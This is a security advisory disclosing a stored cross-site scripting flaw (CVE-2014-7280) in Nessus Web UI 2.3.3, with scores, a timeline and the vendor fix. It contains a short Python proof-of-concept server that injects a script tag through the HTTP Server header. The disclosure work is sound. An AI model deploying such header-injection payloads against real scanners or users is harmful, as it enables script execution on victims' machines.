Nessus Web UI 2.3.3 Cross Site Scripting

2014.10.08
Credit: Frank Lycops
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Nessus Web UI 2.3.3: Stored XSS ========================================================= CVE number: CVE-2014-7280 Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html Vendor advisory: http://www.tenable.com/security/tns-2014-08 -- Info -- Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide. -- Affected version - Web UI version 2.3.3, Build #83 -- Vulnerability details -- By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin. The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header. -- POC -- #!/usr/bin/env python import sys from twisted.web import server, resource from twisted.internet import reactor from twisted.python import log class Site(server.Site): def getResourceFor(self, request): request.setHeader('server', '<script>alert(1)</script>SomeServer') return server.Site.getResourceFor(self, request) class HelloResource(resource.Resource): isLeaf = True numberRequests = 0 def render_GET(self, request): self.numberRequests += 1 request.setHeader("content-type", "text/plain") return "theSecurityFactory Nessus POC" log.startLogging(sys.stderr) reactor.listenTCP(8080, Site(HelloResource())) reactor.run() -- Solution -- This issue has been fixed as of version 2.3.4 of the WEB UI. -- Timeline -- 2014-06-12 Release of Web UI version 2.3.3, build#83 2014-06-13 Vulnerability discovered and creation of POC 2014-06-13 Vulnerability responsibly reported to vendor 2014-06-13 Vulnerability acknowledged by vendor 2014-06-13 Release of Web UI version 2.3.4, build#85 2014-XX-XX Advisory published in coordination with vendor -- Credit -- Frank Lycops Frank.lycops [at] thesecurityfactory.be


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top